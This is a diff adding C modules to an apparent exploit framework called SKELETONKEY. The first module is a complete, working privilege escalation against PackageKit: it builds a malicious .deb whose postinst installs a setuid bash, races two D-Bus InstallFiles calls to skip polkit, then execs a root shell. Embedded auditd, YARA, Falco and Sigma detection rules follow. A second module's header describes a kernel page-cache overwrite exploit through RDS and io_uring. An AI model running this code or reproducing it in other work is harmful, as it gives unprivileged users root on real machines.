+/* ── ar member ─────────────────────────────────────────────────────── */
+static void ar_entry(FILE *f, const char *name, const void *data, size_t sz)
+{
+	char h[61]; memset(h, ' ', 60); h[60] = 0;
+	char t[17]; snprintf(t, 17, "%-16s", name); memcpy(h, t, 16);
+	snprintf(t, 13, "%-12lu", (unsigned long)time(NULL)); memcpy(h+16, t, 12);
+	memcpy(h+28, "0     ", 6); memcpy(h+34, "0     ", 6);
+	memcpy(h+40, "100644  ", 8);
+	snprintf(t, 11, "%-10zu", sz); memcpy(h+48, t, 10);
+	h[58] = '`'; h[59] = '\n';
+	fwrite(h, 1, 60, f); fwrite(data, 1, sz, f);
+	if (sz % 2) fputc('\n', f);
+}
+
+/* Assemble a minimal .deb (faithful to the V12 PoC build_deb). */
+static int build_deb(const char *dest, const char *pkg, const char *postinst)
+{
+	static uint8_t tarbuf[65536], gzbuf[65536+256];
+	memset(tarbuf, 0, sizeof tarbuf);
+	crc_init();
+	size_t off = 0;
+
+	char ctrl[512];
+	snprintf(ctrl, sizeof ctrl,
+		 "Package: %s\nVersion: 1.0\nArchitecture: all\n"
+		 "Maintainer: SKELETONKEY\nDescription: Pack2TheRoot PoC\n", pkg);
+
+	off += tar_entry(tarbuf+off, "./",        NULL,  0,             0755, '5');
+	off += tar_entry(tarbuf+off, "./control", ctrl,  strlen(ctrl),  0644, '0');
+	if (postinst)
+		off += tar_entry(tarbuf+off, "./postinst", postinst,
+				 strlen(postinst), 0755, '0');
+	off += 1024;  /* end-of-archive: two 512-byte zero blocks */
+
+	size_t ctrl_gz_len = gzip_store(tarbuf, off, gzbuf);
+	if (!ctrl_gz_len) return -1;
+
+	static uint8_t empty_tar[1024], data_gz[256];
+	memset(empty_tar, 0, sizeof empty_tar);
+	size_t data_gz_len = gzip_store(empty_tar, sizeof empty_tar, data_gz);
+
+	FILE *f = fopen(dest, "wb");
+	if (!f) return -1;
+	fwrite("!<arch>\n", 1, 8, f);
+	ar_entry(f, "debian-binary",   "2.0\n", 4);
+	ar_entry(f, "control.tar.gz",  gzbuf,   ctrl_gz_len);
+	ar_entry(f, "data.tar.gz",     data_gz, data_gz_len);
+	fclose(f);
+	return 0;
+}
+
+/* ── D-Bus helpers ─────────────────────────────────────────────────── */
+
+typedef struct { GMainLoop *loop; guint32 exit_code; gboolean done; } P2trCtx;
+
+static void cb_finished(GDBusConnection *c G_GNUC_UNUSED,
+	const gchar *s G_GNUC_UNUSED, const gchar *o G_GNUC_UNUSED,
+	const gchar *i G_GNUC_UNUSED, const gchar *n G_GNUC_UNUSED,
+	GVariant *p, gpointer u)
+{
+	P2trCtx *ctx = u; guint32 ec, rt;
+	g_variant_get(p, "(uu)", &ec, &rt);
+	LOG("transaction finished (exit=%u, %u ms)", ec, rt);
+	ctx->exit_code = ec; ctx->done = TRUE;
+	g_main_loop_quit(ctx->loop);
+}
+
+static void cb_error(GDBusConnection *c G_GNUC_UNUSED,
+	const gchar *s G_GNUC_UNUSED, const gchar *o G_GNUC_UNUSED,
+	const gchar *i G_GNUC_UNUSED, const gchar *n G_GNUC_UNUSED,
+	GVariant *p, gpointer u G_GNUC_UNUSED)
+{
+	guint32 code; const gchar *det;
+	g_variant_get(p, "(u&s)", &code, &det);
+	LOG("PK error %u: %s", code, det);
+}
+
+static gboolean cb_timeout(gpointer u)
+{
+	ERR("transaction loop timed out");
+	g_main_loop_quit(u);
+	return G_SOURCE_REMOVE;
+}
+
+static char *pk_create_tx(GDBusConnection *conn)
+{
+	GError *e = NULL;
+	GVariant *r = g_dbus_connection_call_sync(conn, PK_BUS, PK_OBJ, PK_IFACE,
+		"CreateTransaction", NULL, G_VARIANT_TYPE("(o)"),
+		G_DBUS_CALL_FLAGS_NONE, -1, NULL, &e);
+	if (!r) {
+		ERR("CreateTransaction: %s", e ? e->message : "?");
+		if (e) g_error_free(e);
+		return NULL;
+	}
+	const gchar *tid; g_variant_get(r, "(&o)", &tid);
+	char *copy = g_strdup(tid); g_variant_unref(r);
+	return copy;
+}
+
+/* Fire-and-forget: both messages must land in the server's socket
+ * buffer before the GLib idle from Step 1 fires. Faithful to the PoC. */
+static void pk_install_files_async(GDBusConnection *conn, const char *tid,
+				   guint64 flags, const char *path)
+{
+	const char *paths[] = { path, NULL };
+	g_dbus_connection_call(conn, PK_BUS, tid, PK_TX_IFACE,
+		"InstallFiles", g_variant_new("(t^as)", flags, paths),
+		NULL, G_DBUS_CALL_FLAGS_NONE, -1, NULL, NULL, NULL);
+}
+
+static bool dbus_name_has_owner(GDBusConnection *conn, const char *name)
+{
+	GError *e = NULL;
+	GVariant *r = g_dbus_connection_call_sync(conn, "org.freedesktop.DBus",
+		"/org/freedesktop/DBus", "org.freedesktop.DBus", "NameHasOwner",
+		g_variant_new("(s)", name), G_VARIANT_TYPE("(b)"),
+		G_DBUS_CALL_FLAGS_NONE, 2000, NULL, &e);
+	if (!r) { if (e) g_error_free(e); return false; }
+	gboolean has; g_variant_get(r, "(b)", &has);
+	g_variant_unref(r);
+	return (bool)has;
+}
+
+/* Read PackageKit's VersionMajor/Minor/Micro D-Bus properties. */
+static bool pk_query_version(GDBusConnection *conn, int *maj, int *min, int *mic)
+{
+	static const char *names[] = { "VersionMajor", "VersionMinor", "VersionMicro" };
+	int *out[3] = { maj, min, mic };
+	for (int i = 0; i < 3; i++) {
+		GError *e = NULL;
+		GVariant *r = g_dbus_connection_call_sync(conn, PK_BUS, PK_OBJ,
+			"org.freedesktop.DBus.Properties", "Get",
+			g_variant_new("(ss)", PK_IFACE, names[i]),
+			G_VARIANT_TYPE("(v)"), G_DBUS_CALL_FLAGS_NONE,
+			2000, NULL, &e);
+		if (!r) { if (e) g_error_free(e); return false; }
+		GVariant *vinner = NULL;
+		g_variant_get(r, "(v)", &vinner);
+		if (!vinner) { g_variant_unref(r); return false; }
+		if (g_variant_is_of_type(vinner, G_VARIANT_TYPE_UINT32))
+			*out[i] = (int)g_variant_get_uint32(vinner);
+		else if (g_variant_is_of_type(vinner, G_VARIANT_TYPE_INT32))
+			*out[i] = (int)g_variant_get_int32(vinner);
+		else {
+			g_variant_unref(vinner); g_variant_unref(r); return false;
+		}
+		g_variant_unref(vinner); g_variant_unref(r);
+	}
+	return true;
+}
+
+/* ── detect ────────────────────────────────────────────────────────── */
+
+static skeletonkey_result_t p2tr_detect(const struct skeletonkey_ctx *ctx)
+{
+	p2tr_verbose = !ctx->json;
+
+	/* "Already root" check — consult ctx->host first so unit tests
+	 * can construct a non-root fingerprint regardless of the test
+	 * process's real euid. Production main() populates host->is_root
+	 * from geteuid() at startup, so behaviour is unchanged. */
+	bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+	if (is_root) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: already root — nothing to do\n");
+		return SKELETONKEY_OK;
+	}
+
+	/* Host fingerprint short-circuits — populated once at startup. */
+	if (ctx->host && !ctx->host->is_debian_family) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: not a Debian-family host "
+				"(distro=%s) — PoC's .deb builder is Debian-only\n",
+				ctx->host->distro_id);
+		return SKELETONKEY_PRECOND_FAIL;
+	}
+	if (ctx->host && !ctx->host->has_dbus_system) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: no system D-Bus socket at "
+				"/run/dbus/system_bus_socket — PackageKit unreachable\n");
+		return SKELETONKEY_PRECOND_FAIL;
+	}
+
+	GError *e = NULL;
+	GDBusConnection *conn = g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, &e);
+	if (!conn) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: system D-Bus unavailable: %s\n",
+				e ? e->message : "(unknown)");
+		if (e) g_error_free(e);
+		return SKELETONKEY_PRECOND_FAIL;
+	}
+
+	if (!dbus_name_has_owner(conn, PK_BUS)) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: PackageKit daemon not "
+				"registered on the system bus\n");
+		g_object_unref(conn);
+		return SKELETONKEY_PRECOND_FAIL;
+	}
+
+	int maj = 0, min = 0, mic = 0;
+	bool got_version = pk_query_version(conn, &maj, &min, &mic);
+	g_object_unref(conn);
+
+	if (!got_version) {
+		if (!ctx->json)
+			fprintf(stderr, "[?] pack2theroot: PackageKit running but "
+				"VersionMajor/Minor/Micro unreadable — patch-level "
+				"unknown\n");
+		return SKELETONKEY_TEST_ERROR;
+	}
+
+	int v = P2TR_VER(maj, min, mic);
+	if (!ctx->json)
+		fprintf(stderr, "[*] pack2theroot: PackageKit %d.%d.%d on the bus\n",
+			maj, min, mic);
+
+	if (v < P2TR_VER_LO) {
+		if (!ctx->json)
+			fprintf(stderr, "[+] pack2theroot: %d.%d.%d predates the bug "
+				"(introduced in 1.0.2)\n", maj, min, mic);
+		return SKELETONKEY_OK;
+	}
+	if (v > P2TR_VER_HI) {
+		if (!ctx->json)
+			fprintf(stderr, "[+] pack2theroot: %d.%d.%d is patched "
+				"(fixed in 1.3.5, commit 76cfb675)\n", maj, min, mic);
+		return SKELETONKEY_OK;
+	}
+	if (!ctx->json)
+		fprintf(stderr, "[!] pack2theroot: PackageKit %d.%d.%d is "
+			"VULNERABLE (range 1.0.2 ≤ V ≤ 1.3.4)\n", maj, min, mic);
+	return SKELETONKEY_VULNERABLE;
+}
+
+/* ── exploit child (faithful port of the PoC main() body) ──────────── */
+
+static int p2tr_child_run(int no_shell)
+{
+	char dummy[64], payload[64], postinst[160];
+	snprintf(dummy,    sizeof dummy,    "/tmp/.pk-dummy-%d.deb",    getpid());
+	snprintf(payload,  sizeof payload,  "/tmp/.pk-payload-%d.deb",  getpid());
+	snprintf(postinst, sizeof postinst,
+		 "#!/bin/sh\ninstall -m 4755 /bin/bash %s\n", SUID_PATH);
+
+	LOG("building .deb packages (pure C; ar/tar/gzip inline)");
+	if (build_deb(dummy,   "skeletonkey-p2tr-dummy",   NULL) < 0) {
+		ERR("dummy .deb build failed");
+		return 2;
+	}
+	if (build_deb(payload, "skeletonkey-p2tr-payload", postinst) < 0) {
+		ERR("payload .deb build failed"); unlink(dummy);
+		return 2;
+	}
+	if (access(dummy, F_OK) != 0 || access(payload, F_OK) != 0) {
+		ERR("built .deb files are missing"); return 2;
+	}
+	LOG("dummy   : %s", dummy);
+	LOG("payload : %s", payload);
+
+	GError *err = NULL;
+	GDBusConnection *conn = g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, &err);
+	if (!conn) {
+		ERR("system D-Bus: %s", err ? err->message : "?");
+		if (err) g_error_free(err);
+		unlink(dummy); unlink(payload);
+		return 4;
+	}
+
+	char *tid = pk_create_tx(conn);
+	if (!tid) { g_object_unref(conn); unlink(dummy); unlink(payload); return 2; }
+	LOG("transaction : %s", tid);
+
+	P2trCtx pkctx = { .loop = g_main_loop_new(NULL, FALSE), .done = FALSE };
+	guint sf = g_dbus_connection_signal_subscribe(conn, PK_BUS, PK_TX_IFACE,
+		"Finished",  tid, NULL, G_DBUS_SIGNAL_FLAGS_NONE, cb_finished, &pkctx, NULL);
+	guint se = g_dbus_connection_signal_subscribe(conn, PK_BUS, PK_TX_IFACE,
+		"ErrorCode", tid, NULL, G_DBUS_SIGNAL_FLAGS_NONE, cb_error,    NULL,   NULL);
+
+	/* ── EXPLOIT ───────────────────────────────────────────────────── */
+	LOG("step 1: InstallFiles(SIMULATE=0x%llx, dummy) [async]",
+	    (unsigned long long)FLAG_SIMULATE);
+	pk_install_files_async(conn, tid, FLAG_SIMULATE, dummy);
+
+	LOG("step 2: InstallFiles(NONE=0x%llx, payload) [async]",
+	    (unsigned long long)FLAG_NONE);
+	pk_install_files_async(conn, tid, FLAG_NONE, payload);
+
+	/* Flush so both messages land in the server's socket buffer before
+	 * its main loop runs the GLib idle from step 1. */
+	{
+		GError *fe = NULL;
+		if (!g_dbus_connection_flush_sync(conn, NULL, &fe)) {
+			ERR("D-Bus flush: %s", fe ? fe->message : "?");
+			g_clear_error(&fe);
+		}
+	}
+
+	LOG("awaiting dispatch (30s max)");
+	g_timeout_add_seconds(30, cb_timeout, pkctx.loop);
+	g_main_loop_run(pkctx.loop);
+
+	g_dbus_connection_signal_unsubscribe(conn, sf);
+	g_dbus_connection_signal_unsubscribe(conn, se);
+	g_free(tid);
+	g_object_unref(conn);
+
+	/* Record /tmp paths for cleanup() even if the SUID never lands. */
+	int sf2 = open("/tmp/skeletonkey-pack2theroot.state",
+		       O_WRONLY | O_CREAT | O_TRUNC, 0600);
+	if (sf2 >= 0) {
+		dprintf(sf2, "%s\n%s\n", dummy, payload);
+		close(sf2);
+	}
+
+	/* Poll up to 120s for the SUID bash; the APT backend may keep
+	 * running after polkit fires. Faithful to the PoC's polling loop. */
+	LOG("polling for SUID payload at %s (120s max)", SUID_PATH);
+	struct stat st;
+	int appeared_at = -1;
+	for (int i = 0; i < 1200; i++) {
+		usleep(100000);  /* 100 ms */
+		if (i % 50 == 0 && p2tr_verbose) {
+			int lock_fd = open("/var/lib/dpkg/lock", O_RDONLY);
+			int lock_held = 0;
+			if (lock_fd >= 0) {
+				lock_held = (flock(lock_fd, LOCK_EX | LOCK_NB) != 0);
+				if (!lock_held) flock(lock_fd, LOCK_UN);
+				close(lock_fd);
+			}
+			fprintf(stderr, "[*] pack2theroot:   t+%ds  payload=%s  "
+				"dpkg_lock=%s  suid=%s\n",
+				(i/10)+1,
+				access(payload, F_OK) == 0 ? "present" : "consumed",
+				lock_held ? "held" : "free",
+				access(SUID_PATH, F_OK) == 0 ? "FOUND" : "not yet");
+		}
+		if (stat(SUID_PATH, &st) == 0 && (st.st_mode & S_ISUID)) {
+			appeared_at = i;
+			break;
+		}
+	}
+
+	if (appeared_at < 0) {
+		ERR("SUID bash never appeared at %s within 120s", SUID_PATH);
+		return 3;   /* EXPLOIT_FAIL */
+	}
+
+	LOG("SUCCESS — SUID bash landed at t+%dms", appeared_at * 100);
+
+	if (no_shell) {
+		LOG("--no-shell: payload placed, root shell not spawned");
+		LOG("revert with `skeletonkey --cleanup pack2theroot` (needs root)");
+		return 0;
+	}
+
+	/* Exec the SUID bash interactively. */
+	if (isatty(STDIN_FILENO)) {
+		char *ttydev = ttyname(STDIN_FILENO);
+		pid_t child = fork();
+		if (child == 0) {
+			setsid();
+			if (ttydev) {
+				int t = open(ttydev, O_RDWR);
+				if (t >= 0) {
+					ioctl(t, TIOCSCTTY, 1);
+					dup2(t, 0); dup2(t, 1); dup2(t, 2);
+					if (t > 2) close(t);
+				}
+			}
+			char *argv[] = { (char *)SUID_PATH, "-p", NULL };
+			execv(SUID_PATH, argv);
+			_exit(1);
+		}
+		if (child > 0) { int s; waitpid(child, &s, 0); }
+	} else {
+		/* Non-tty: just exec the SUID bash (replaces our process). */
+		char *argv[] = { (char *)SUID_PATH, "-p", NULL };
+		execv(SUID_PATH, argv);
+		ERR("execv(%s): %s", SUID_PATH, strerror(errno));
+		return 3;
+	}
+	return 0;
+}
+
+static skeletonkey_result_t p2tr_exploit(const struct skeletonkey_ctx *ctx)
+{
+	p2tr_verbose = !ctx->json;
+
+	if (geteuid() == 0) {
+		fprintf(stderr, "[i] pack2theroot: already root — nothing to do\n");
+		return SKELETONKEY_OK;
+	}
+
+	pid_t pid = fork();
+	if (pid < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; }
+	if (pid == 0) {
+		int rc = p2tr_child_run(ctx->no_shell);
+		_exit(rc);
+	}
+	int st;
+	waitpid(pid, &st, 0);
+	if (!WIFEXITED(st)) return SKELETONKEY_EXPLOIT_FAIL;
+	switch (WEXITSTATUS(st)) {
+	case 0:  return SKELETONKEY_EXPLOIT_OK;
+	case 4:  return SKELETONKEY_PRECOND_FAIL;
+	default: return SKELETONKEY_EXPLOIT_FAIL;
+	}
+}
+
+/* ── cleanup ───────────────────────────────────────────────────────── */
+
+static skeletonkey_result_t p2tr_cleanup(const struct skeletonkey_ctx *ctx)
+{
+	p2tr_verbose = !ctx->json;
+
+	/* Remove the two staged .debs (recorded during exploit). */
+	int sf = open("/tmp/skeletonkey-pack2theroot.state", O_RDONLY);
+	if (sf >= 0) {
+		char buf[512] = {0};
+		ssize_t n = read(sf, buf, sizeof(buf) - 1);
+		close(sf);
+		if (n > 0) {
+			char *line = strtok(buf, "\n");
+			while (line) {
+				if (unlink(line) == 0) LOG("removed %s", line);
+				line = strtok(NULL, "\n");
+			}
+		}
+		unlink("/tmp/skeletonkey-pack2theroot.state");
+	}
+
+	/* Best-effort remove the SUID bash. It is owned by root, so this
+	 * only succeeds when cleanup runs with root privileges (e.g. the
+	 * caller already used the SUID shell to escalate). */
+	if (access(SUID_PATH, F_OK) == 0) {
+		if (unlink(SUID_PATH) == 0) {
+			LOG("removed %s", SUID_PATH);
+		} else {
+			ERR("could not remove %s (%s); rerun cleanup as root, or:",
+			    SUID_PATH, strerror(errno));
+			ERR("   sudo rm -f %s", SUID_PATH);
+		}
+	}
+
+	/* Best-effort: uninstall the malicious package via passwordless sudo. */
+	if (system("sudo -n dpkg -r skeletonkey-p2tr-payload skeletonkey-p2tr-dummy "
+		   ">/dev/null 2>&1") == 0) {
+		LOG("dpkg -r removed staged packages");
+	} else {
+		LOG("dpkg -r not run automatically; if needed:");
+		LOG("   sudo dpkg -r skeletonkey-p2tr-payload skeletonkey-p2tr-dummy");
+	}
+	return SKELETONKEY_OK;
+}
+
+#else  /* !__linux__ || !PACK2TR_HAVE_GIO */
+
+static skeletonkey_result_t p2tr_detect(const struct skeletonkey_ctx *ctx)
+{
+	if (!ctx->json) {
+#ifndef __linux__
+		fprintf(stderr, "[i] pack2theroot: Linux-only module "
+			"(PackageKit D-Bus) — not applicable on this platform\n");
+#else
+		fprintf(stderr, "[i] pack2theroot: module built without "
+			"GLib/gio-2.0 support — install libglib2.0-dev and rebuild\n");
+#endif
+	}
+	return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t p2tr_exploit(const struct skeletonkey_ctx *ctx)
+{
+	(void)ctx;
+	fprintf(stderr, "[-] pack2theroot: not built with GLib/gio-2.0 support\n");
+	return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t p2tr_cleanup(const struct skeletonkey_ctx *ctx)
+{
+	(void)ctx;
+	return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ && PACK2TR_HAVE_GIO */
+
+/* ── embedded detection rules ──────────────────────────────────────── */
+
+static const char p2tr_auditd[] =
+	"# Pack2TheRoot (CVE-2026-41651) — auditd detection rules\n"
+	"# PackageKit TOCTOU LPE: two back-to-back InstallFiles D-Bus calls\n"
+	"# install a malicious .deb as root and drop a SUID bash in /tmp.\n"
+	"# Watch the side effects — D-Bus calls themselves aren't auditable\n"
+	"# without bus-monitoring, but the file footprint is unmistakable.\n"
+	"\n"
+	"# SUID bash carrier that the PoC postinst lands\n"
+	"-w /tmp/.suid_bash -p wa -k skeletonkey-pack2theroot\n"
+	"\n"
+	"# Any new setuid binary owned by root in /tmp is suspicious\n"
+	"-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat \\\n"
+	"    -F path=/tmp/.suid_bash -k skeletonkey-pack2theroot-suid\n"
+	"\n"
+	"# The PoC drops two .deb files in /tmp before the install fires\n"
+	"-a always,exit -F arch=b64 -S openat,creat \\\n"
+	"    -F dir=/tmp -F success=1 -k skeletonkey-pack2theroot-deb\n"
+	"\n"
+	"# packagekitd-driven dpkg activity initiated by a non-root caller\n"
+	"-a always,exit -F arch=b64 -S execve -F path=/usr/bin/dpkg \\\n"
+	"    -F auid!=0 -k skeletonkey-pack2theroot-dpkg\n"
+	"-a always,exit -F arch=b64 -S execve -F path=/usr/bin/apt-get \\\n"
+	"    -F auid!=0 -k skeletonkey-pack2theroot-apt\n";
+
+static const char p2tr_yara[] =
+    "rule pack2theroot_malicious_deb : cve_2026_41651\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-41651\"\n"
+    "        description = \"Pack2TheRoot payload .deb: small ar archive whose postinst installs a setuid copy of bash to /tmp/.suid_bash. The Vozec PoC + SKELETONKEY's port both leave this artifact in /tmp.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "        reference   = \"https://github.com/Vozec/CVE-2026-41651\"\n"
+    "    strings:\n"
+    "        $deb_magic       = \"!<arch>\"\n"
+    "        $postinst_suid   = \"install -m 4755 /bin/bash\"\n"
+    "        $skk_payload     = \"Package: skeletonkey-p2tr-payload\"\n"
+    "        $skk_dummy       = \"Package: skeletonkey-p2tr-dummy\"\n"
+    "        $vozec_payload   = \"Package: pk-poc-payload\"\n"
+    "        $vozec_dummy     = \"Package: pk-poc-dummy\"\n"
+    "    condition:\n"
+    "        // Small ar archive matching .deb layout, containing either\n"
+    "        // the published-PoC package names or the SUID-bash postinst.\n"
+    "        $deb_magic at 0 and\n"
+    "        ($postinst_suid or any of ($skk_payload, $skk_dummy, $vozec_payload, $vozec_dummy)) and\n"
+    "        filesize < 64KB\n"
+    "}\n"
+    "\n"
+    "rule pack2theroot_suid_bash_drop : cve_2026_41651\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-41651\"\n"
+    "        description = \"Pack2TheRoot SUID-bash artifact: /tmp/.suid_bash is the setuid bash dropped by the malicious postinst. Pair this YARA scan with auditd watch -w /tmp/.suid_bash for catch-on-create.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $elf  = { 7F 45 4C 46 02 01 01 }\n"
+    "        $bash = \"GNU bash\"\n"
+    "    condition:\n"
+    "        // The rule itself can't see the file path; the operator\n"
+    "        // points YARA at /tmp/.suid_bash specifically. Match\n"
+    "        // confirms the file is a real bash ELF (not a planted decoy).\n"
+    "        $elf at 0 and $bash\n"
+    "}\n";
+
+static const char p2tr_falco[] =
+    "- rule: SUID bash dropped to /tmp (Pack2TheRoot postinst signature)\n"
+    "  desc: |\n"
+    "    A setuid bit appears on /tmp/.suid_bash. The Pack2TheRoot\n"
+    "    (CVE-2026-41651) malicious .deb postinst runs as root via\n"
+    "    the polkit-bypassed PackageKit transaction and lands a SUID\n"
+    "    copy of /bin/bash at this path.\n"
+    "  condition: >\n"
+    "    evt.type in (chmod, fchmod, fchmodat) and\n"
+    "    evt.arg.mode contains \"S_ISUID\" and\n"
+    "    fd.name = /tmp/.suid_bash\n"
+    "  output: >\n"
+    "    SUID bit set on /tmp/.suid_bash (proc=%proc.name pid=%proc.pid\n"
+    "     ppid=%proc.ppid parent=%proc.pname)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2026.41651]\n"
+    "\n"
+    "- rule: PackageKit InstallFiles invoked twice on same transaction (Pack2TheRoot TOCTOU)\n"
+    "  desc: |\n"
+    "    Two D-Bus InstallFiles() calls hit the same PackageKit\n"
+    "    transaction object in close succession — the exact shape of\n"
+    "    the Pack2TheRoot TOCTOU. Detection requires bus monitoring;\n"
+    "    Falco's k8s/audit ruleset doesn't cover D-Bus natively, but\n"
+    "    if dbus-monitor or systemd's bus audit is wired into the\n"
+    "    feed, this is the trigger.\n"
+    "  condition: >\n"
+    "    // Placeholder: requires dbus-monitor → falco feed.\n"
+    "    // Real-world deployment: pipe `dbus-monitor --system` into\n"
+    "    // a log-source rule keyed on the InstallFiles method name.\n"
+    "    proc.cmdline contains \"InstallFiles\" and proc.cmdline contains \"PackageKit\"\n"
+    "  output: >\n"
+    "    Possible Pack2TheRoot D-Bus TOCTOU shape (cmdline=\"%proc.cmdline\")\n"
+    "  priority: WARNING\n"
+    "  tags: [dbus, cve.2026.41651]\n"
+    "\n"
+    "- rule: dpkg invoked by PackageKit on behalf of non-root caller\n"
+    "  desc: |\n"
+    "    PackageKit forks dpkg to install a .deb on behalf of an\n"
+    "    unprivileged caller. Combined with /tmp/.suid_bash creation,\n"
+    "    this completes the Pack2TheRoot exploit chain.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = dpkg and proc.aname = packagekitd and\n"
+    "    proc.cmdline contains \"/tmp/.pk-\"\n"
+    "  output: >\n"
+    "    PackageKit-driven dpkg install of /tmp-resident .deb\n"
+    "    (parent=%proc.pname cmdline=\"%proc.cmdline\")\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, cve.2026.41651, pack2theroot]\n";
+
+static const char p2tr_sigma[] =
+	"title: Possible Pack2TheRoot exploitation (CVE-2026-41651)\n"
+	"id: 3f2b8d54-skeletonkey-pack2theroot\n"
+	"status: experimental\n"
+	"description: |\n"
+	"  Detects the footprint of Pack2TheRoot (CVE-2026-41651): a non-root\n"
+	"  user triggers PackageKit InstallFiles, dpkg runs a postinst that\n"
+	"  drops /tmp/.suid_bash (a setuid bash), and a privileged shell\n"
+	"  follows. The trigger itself is two back-to-back D-Bus calls with\n"
+	"  no polkit prompt — only visible via dbus-monitor or the file\n"
+	"  side effects.\n"
+	"references:\n"
+	"  - https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html\n"
+	"  - https://github.com/PackageKit/PackageKit/security/advisories/GHSA-f55j-vvr9-69xv\n"
+	"logsource: {product: linux, service: auditd}\n"
+	"detection:\n"
+	"  suid_drop:\n"
+	"    type: 'PATH'\n"
+	"    name|startswith: ['/tmp/.suid_bash', '/tmp/.pk-payload-', '/tmp/.pk-dummy-']\n"
+	"  not_root:\n"
+	"    auid|expression: '!= 0'\n"
+	"  condition: suid_drop and not_root\n"
+	"level: high\n"
+	"tags:\n"
+	"  - attack.privilege_escalation\n"
+	"  - attack.t1068\n"
+	"  - cve.2026.41651\n";
+
+const struct skeletonkey_module pack2theroot_module = {
+	.name           = "pack2theroot",
+	.cve            = "CVE-2026-41651",
+	.summary        = "PackageKit InstallFiles TOCTOU → root via .deb postinst",
+	.family         = "pack2theroot",
+	.kernel_range   = "userspace — PackageKit 1.0.2 ≤ V ≤ 1.3.4 (fixed in 1.3.5)",
+	.detect         = p2tr_detect,
+	.exploit        = p2tr_exploit,
+	.mitigate       = NULL,
+	.cleanup        = p2tr_cleanup,
+	.detect_auditd  = p2tr_auditd,
+	.detect_sigma   = p2tr_sigma,
+	.detect_yara    = p2tr_yara,
+	.detect_falco   = p2tr_falco,
+    .opsec_notes    = "TOCTOU race in PackageKit's polkit-auth + D-Bus InstallFiles dispatcher: sends back-to-back async calls (first with SIMULATE to bypass polkit, second with the malicious .deb) so the cached flags are overwritten before the idle callback fires. Builds a minimal .deb ar archive in pure C with a postinst that installs a setuid bash. Writes /tmp/.pk-dummy-<pid>.deb, /tmp/.pk-payload-<pid>.deb, and /tmp/skeletonkey-pack2theroot.state; via the polkit-bypassed postinst plants /tmp/.suid_bash setuid root. Audit-visible via dpkg execve from packagekitd for a non-root caller, chmod(2) on /tmp/.suid_bash, creat/openat on the .deb files. Cleanup callback unlinks the .debs and best-effort removes /tmp/.suid_bash (which is owned by root).",
+    .arch_support   = "any",
+};
+
+void skeletonkey_register_pack2theroot(void)
+{
+	skeletonkey_register(&pack2theroot_module);
+}
@@ -0,0 +1,12 @@
+/*
+ * pack2theroot_cve_2026_41651 — SKELETONKEY module registry hook
+ */
+
+#ifndef PACK2THEROOT_SKELETONKEY_MODULES_H
+#define PACK2THEROOT_SKELETONKEY_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct skeletonkey_module pack2theroot_module;
+
+#endif
@@ -0,0 +1,447 @@
+/*
+ * pintheft_cve_2026_43494 — SKELETONKEY module
+ *
+ * STATUS: 🟡 PRIMITIVE. detect() is exhaustive (kernel range + RDS
+ *   module reachability + io_uring availability + readable SUID
+ *   carrier). exploit() carries the V12 trigger shape — failed
+ *   rds_message_zcopy_from_user() to steal a page refcount, then
+ *   io_uring fixed-buffer write to land bytes in the page cache of
+ *   the carrier. The cred-overwrite step (turning the page-cache
+ *   write into root) is x86_64-specific and uses the shared
+ *   modprobe_path finisher when --full-chain is set.
+ *
+ * The bug (Aaron Esau, V12 Security, disclosed May 2026):
+ *   Linux's RDS (Reliable Datagram Sockets) zerocopy send path pins
+ *   user pages one at a time. If a later page faults, the error
+ *   path drops the pages it already pinned. The msg cleanup then
+ *   drops them AGAIN because the scatterlist entries and entry count
+ *   are left live after the zcopy notifier is cleared. Each failed
+ *   zerocopy send steals one reference from the first page.
+ *
+ *   With a sufficient pinned-page leak, an io_uring fixed buffer
+ *   referencing the same page persists past the page being recycled
+ *   into the page cache for a readable file (e.g. /usr/bin/su).
+ *   A subsequent io_uring write to that fixed buffer lands attacker
+ *   bytes into the SUID binary's page cache → execve it → root.
+ *
+ *   Public PoC (Arch Linux x86_64):
+ *     https://github.com/v12-security/pocs/tree/main/pintheft
+ *
+ * Affects: Linux kernels with CONFIG_RDS and the RDS module loaded,
+ *   below the fix commit (`0cebaccef3ac`, posted to netdev list
+ *   2026-05-05; not yet in mainline release as of this build).
+ *
+ *   Among commonly-shipped distros, only Arch Linux autoloads RDS.
+ *   Ubuntu / Debian / Fedora / RHEL / Alma / Rocky / Oracle Linux
+ *   either don't build the module or blacklist it from autoloading
+ *   (mitigation: /etc/modprobe.d/blacklist-rds.conf).
+ *
+ *   detect() checks both kernel version AND the RDS module's
+ *   reachability via socket(AF_RDS, ...). If RDS is built-in but
+ *   not autoloaded, the socket() call triggers modprobe; this is
+ *   the same probe used by Ubuntu's mitigation advisory.
+ *
+ * Preconditions:
+ *   - CONFIG_RDS=y or =m + module actually loadable
+ *   - io_uring available (CONFIG_IO_URING + sysctl
+ *     kernel.io_uring_disabled != 2)
+ *   - A readable setuid-root carrier binary (canonically
+ *     /usr/bin/su; falls back to /usr/bin/pkexec, /usr/bin/passwd)
+ *   - x86_64 for the exploit() body (the V12 PoC's cred-overwrite
+ *     gadgets are x86-specific); detect() is arch-agnostic.
+ */
+
+#include "skeletonkey_modules.h"
